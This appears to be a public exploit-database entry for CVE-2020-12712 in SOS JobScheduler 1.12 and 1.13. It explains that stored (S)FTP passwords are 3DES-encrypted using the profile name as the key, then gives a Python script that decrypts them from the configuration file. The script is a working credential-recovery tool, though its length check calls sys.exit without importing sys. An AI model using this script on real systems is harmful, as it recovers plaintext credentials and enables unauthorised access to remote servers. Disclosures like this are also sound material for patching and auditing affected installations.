# Exploit Title: SOS JobScheduler 1.13.3 - Stored Password Decryption # Google Dork: N/A # Date: 2020-04-20 # Exploit Author: Sander Ubink # Vendor Homepage: www.sos-berlin.com # Software Link: www.sos-berlin.com/en/jobscheduler-downloads # Version: Tested on 1.12.9 and 1.13.3, vendor reported 1.12 and 1.13 # Tested on: Windows and Linux # CVE: CVE-2020-12712 # Description: SOS JobScheduler is a tool for remote system administration that allows users to call maintenance scripts via a web interface. # The tool places the maintenance scripts on the remote systems by means of (S)FTP. It allows the user to save profiles for these connections, # in which the password for the (S)FTP connection is optionally stored. When the user chooses to store the password with the profile, # it is encrypted using the name of the profile as the encryption key. Since the name of the profile is stored in the same configuration file, # the plaintext (S)FTP password can trivially be recovered. The encryption algorithm used is Triple DES (3DES) with three keys, requiring a key # length of 24 bytes. The profile name is padded to this length to create the key. Finally, the encrypted password gets base64 encoded before # being stored in the configuration file. # Usage: python jobscheduler-decrypt.py [encrypted password in base64] [profile name] import pyDes import base64 import argparse parser = argparse.ArgumentParser(description="Decrypt the password stored in a Jobscheduler (S)FTP profile configuration file") parser.add_argument("password", help="password to be decrypted") parser.add_argument("profilename", help="name of the profile") args = parser.parse_args() if len(args.profilename) > 24: sys.exit("Profile name is longer than 24 characters. Check the validity of the input.") key = args.profilename + ((24 - len(args.profilename)) * " ") cipher = pyDes.triple_des(key, pyDes.ECB, b"\0\0\0\0\0\0\0\0", pad=" ", padmode=None) plain = cipher.decrypt(base64.b64decode(args.password)) print(plain)